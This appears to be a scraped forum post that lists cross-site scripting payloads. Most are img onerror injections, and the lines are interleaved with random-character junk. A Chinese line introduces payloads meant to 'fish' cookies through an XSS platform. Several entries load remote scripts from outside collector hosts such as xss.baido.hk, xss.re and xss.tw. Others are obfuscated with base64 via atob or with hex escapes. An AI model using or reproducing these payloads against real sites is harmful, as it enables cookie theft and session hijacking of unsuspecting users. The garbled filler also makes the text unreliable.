<img src='non-exist.jpg'onerror="alert('xss')">
, V, U9 C% g- R1 ?% L7 t' R+ z<img src=# onerror=alert(123)># @8 O9 F3 ^8 d
<img src=# onerror=alert(document.cookie)>3 J$ r b5 ~. y" h N+ F% g- C
下面是利用平台钓cookie的
' A2 K* E! W6 l$ H <img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>/ g" r X# z+ v! L2 o; \% B# b
& \0 l2 G' I' n! v& x+ f
. T" q$ e9 U5 j G<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>3 }/ `2 B0 a6 x$ W! y8 E
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
: K' Q2 `5 O& H! B3 [“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
: ]7 l+ _8 Y, X' @/ T<img src=1 onerror=jQuery.getScript("//xss.re/974")> # d- Y! i$ j5 n% e g8 n
<img src="#">
6 H: Y& H, V! A% D<img src="#">3 J9 Z) K& T; v- R0 S* \1 |
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>, Y; F8 ] y: P8 C- I0 T' M, z! K
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">2 L3 P' s/ r, S1 g* w# g; R
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
: R2 h1 l' L9 C" _<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
/ G6 s: o% x/ K9 c<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
* K, U% L% J' G9 X j8 _<img src=x width="0" height="0"></img>' m% Y6 N" G4 P8 ~
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
- {. o+ N- p3 N$ R% t$ ?$ |, d<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>1 c: m* }% w: R+ q) s0 T1 \) c
|